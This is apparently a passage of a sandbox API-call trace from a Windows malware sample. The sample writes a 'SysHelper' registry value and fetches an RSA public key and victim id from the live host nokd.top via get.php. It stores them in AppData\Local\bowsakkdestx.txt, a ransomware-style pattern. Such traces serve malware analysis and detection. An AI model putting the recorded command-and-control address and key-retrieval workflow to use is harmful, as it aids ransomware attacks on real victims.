0x32b1708 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32b1f90 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32b2818 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32b30a0 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x328b0d0 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32b3928 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32b41b0 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32b8dd8 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32b9620 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32b9e88 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32b4a38 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32b52c0 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32ba6f0 [0205.515] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32baf38 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32b5b48 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32b63d0 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32bb798 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32bc020 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32bc8a8 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32bd130 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32bd9b8 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32be240 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32beac8 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32bf350 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32cb780 [0205.516] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32cbfe8 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32bfbd8 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c0460 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c0ce8 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32cc850 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32cd098 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c1570 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c1df8 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c2680 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c2f08 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c3790 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c4018 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c48a0 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c5128 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c59b0 [0205.517] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32cd8e0 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32ce148 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c6238 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c6ac0 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c7348 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32ce9b0 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32c7bd0 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c8458 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c8ce0 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32c9568 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32c9df0 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32ca678 [0205.518] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32cf210 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32cfa98 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d0320 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d0ba8 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32df1f8 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x32dfa60 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d1430 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d1cb8 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d2540 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d2dc8 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d3650 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d3ed8 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d4760 [0205.519] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d4fe8 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d5870 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc0) returned 0x32586f8 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d60f8 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32e02c8 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32e0ae0 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32e12f8 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32e1b10 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32e2328 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32e2b40 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d6980 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d530 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d7208 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d7a90 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d8318 [0205.520] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d8ba0 [0205.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x3289768, dwCreationFlags=0x0, lpThreadId=0x325e628 | out: lpThreadId=0x325e628*=0x1cc) returned 0x338 [0205.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x164) returned 0x330 [0205.522] GetMessageW (lpMsg=0x18d830, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0218.597] NtdllDefWindowProc_W () returned 0x0 [0222.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a91f88 [0222.834] GetComputerNameW (in: lpBuffer=0x3a91f88, nSize=0x18cbac | out: lpBuffer="XDUWTFONO", nSize=0x18cbac) returned 1 [0222.834] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286350 [0222.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0222.834] IsWindow (hWnd=0x2011c) returned 1 [0222.834] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286350 | out: hHeap=0x750000) returned 1 Thread: id = 131 os_tid = 0x5c8 Thread: id = 132 os_tid = 0x5dc Thread: id = 133 os_tid = 0x5d8 Thread: id = 134 os_tid = 0x36c Thread: id = 135 os_tid = 0x570 Thread: id = 136 os_tid = 0x574 Thread: id = 152 os_tid = 0x408 Thread: id = 153 os_tid = 0x404 Thread: id = 154 os_tid = 0x160 [0203.292] timeGetTime () returned 0x1137b48 [0203.292] GetLastError () returned 0x54f [0203.292] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3bc) returned 0x3256d70 [0203.292] GetCurrentThreadId () returned 0x160 [0203.292] SetLastError (dwErrCode=0x54f) [0203.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x98ea5e4 | out: phkResult=0x98ea5e4*=0x36c) returned 0x0 [0203.293] RegQueryValueExW (in: hKey=0x36c, lpValueName="SysHelper", lpReserved=0x0, lpType=0x98ea5d8, lpData=0x98ea5e0, lpcbData=0x98ea5dc*=0x4 | out: lpType=0x98ea5d8*=0x0, lpData=0x98ea5e0*=0x0, lpcbData=0x98ea5dc*=0x4) returned 0x2 [0203.293] RegSetValueExW (in: hKey=0x36c, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0x98ea5e0*=0x1, cbData=0x4 | out: lpData=0x98ea5e0*=0x1) returned 0x0 [0203.325] RegCloseKey (hKey=0x36c) returned 0x0 [0203.325] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98ea4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0203.325] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0203.325] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x3272848 [0203.326] AreFileApisANSI () returned 1 [0203.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98ea4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0203.333] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7a) returned 0x7b1bd8 [0203.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98ea4e4, cbMultiByte=-1, lpWideCharStr=0x7b1bd8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0203.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x98ea368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.376] GetLastError () returned 0x2 [0203.376] GetLastError () returned 0x2 [0203.376] SetLastError (dwErrCode=0x2) [0203.376] GetLastError () returned 0x2 [0203.376] SetLastError (dwErrCode=0x2) [0203.376] GetLastError () returned 0x2 [0203.376] SetLastError (dwErrCode=0x2) [0203.382] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1bd8 | out: hHeap=0x750000) returned 1 [0203.382] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0203.382] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d390 [0203.382] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8e) returned 0x77e3b0 [0203.382] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d390 | out: hHeap=0x750000) returned 1 [0203.382] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323d7f0 [0203.382] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x325e940 [0203.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x323d7f0, cbMultiByte=-1, lpWideCharStr=0x325e940, cchWideChar=1056 | out: lpWideCharStr="61EEC85770ED6E24294ED56A7224FB65") returned 33 [0203.382] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x850) returned 0x3284f50 [0203.382] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0203.383] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323d7f0 | out: hHeap=0x750000) returned 1 [0203.383] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8b0) returned 0x325e940 [0203.383] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e3b0 | out: hHeap=0x750000) returned 1 [0203.383] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3284f50 | out: hHeap=0x750000) returned 1 [0203.383] lstrcpyW (in: lpString1=0x98eaf78, lpString2="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=61EEC85770ED6E24294ED56A7224FB65" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=61EEC85770ED6E24294ED56A7224FB65") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=61EEC85770ED6E24294ED56A7224FB65" [0203.383] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=61EEC85770ED6E24294ED56A7224FB65", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0204.187] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x98ea778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x98ea604 | out: lpBuffer=0x98ea778*, lpdwNumberOfBytesRead=0x98ea604*=0x232) returned 1 [0204.188] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98ea670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0204.188] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0204.188] AreFileApisANSI () returned 1 [0204.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98ea670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0204.188] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7a) returned 0x7b1c60 [0204.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98ea670, cbMultiByte=-1, lpWideCharStr=0x7b1c60, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0204.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x98ea47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0204.190] GetFileType (hFile=0x348) returned 0x1 [0204.190] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x750000) returned 1 [0204.190] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 562 [0204.190] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1000) returned 0x3286980 [0204.190] WriteFile (in: hFile=0x348, lpBuffer=0x98e9118*, nNumberOfBytesToWrite=0x232, lpNumberOfBytesWritten=0x98e8a44, lpOverlapped=0x0 | out: lpBuffer=0x98e9118*, lpNumberOfBytesWritten=0x98e8a44*=0x232, lpOverlapped=0x0) returned 1 [0204.201] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286980 | out: hHeap=0x750000) returned 1 [0204.201] CloseHandle (hObject=0x348) returned 1 [0204.202] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0204.238] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0204.238] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x325e940 | out: hHeap=0x750000) returned 1 [0204.238] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0204.238] lstrcpyA (in: lpString1=0x98eab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.239] lstrcpyA (in: lpString1=0x98ea778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0204.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 [0204.239] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 547 